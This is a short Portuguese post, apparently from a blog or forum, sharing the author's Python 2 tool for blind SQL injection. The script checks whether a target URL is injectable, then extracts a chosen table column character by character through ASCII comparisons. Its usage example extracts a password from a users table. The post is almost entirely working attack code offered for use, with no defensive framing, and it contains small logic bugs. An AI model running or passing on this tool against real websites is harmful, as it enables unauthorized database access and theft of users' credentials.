Tweet
Esse é o Bind SQL Injection, um dos meus Tools mais antigos. Ao inves de fazer brute force manualmente, pode-se usar uma ferramenta para isso para facilitar.
Código:
#!/usr/bin/python
import urllib,sys
banner = """
____ _______ _____
| _ \ |__ __| |_ _|
| |_) | | | | |
| _ < | | | |
| |_) | _ | | _ _| |_
|____/ (_) |_| (_) |_____|
------------------------------------
Blind Twi Injection
------------------------------------
Coded By Twi John
"""
print banner
if len(sys.argv) != 5:
print "Usage: %s <url> <table> <column> <max-caracters>" % sys.argv[0]
print "Ex: %s http://www.site.com/news.php?id=1 users password 7\n" % sys.argv[0]
sys.exit(0)
url = sys.argv[1]
table = sys.argv[2]
column = sys.argv[3]
n = int(sys.argv[4])
def bsqli():
print ("\n[+]Started\n")
word = ""
n1 = n + 1
for n3 in range(1,n1):
for i in range(97,127):
f = urllib.urlopen(url+"+and+ascii(substring((select+concat("+column+")+from+"+table+"+limit+0,1),+"+str(n3)+",1))="+str(i))
code3 = f.read()
if (code3 == code):
word = word+chr(i)
break
print "Result: " + word
f = urllib.urlopen(url+"+and+1=1--")
code = f.read()
f = urllib.urlopen(url+"and+1=0--")
code1 = f.read()
if (code != code1):
print("Vulnerable!")
else:
print("This website is not vulnerable!")
res = raw_input("Continue[y]: ")
if res == "y" or "Y":
bsqli()
else:
sys.exit()
Comment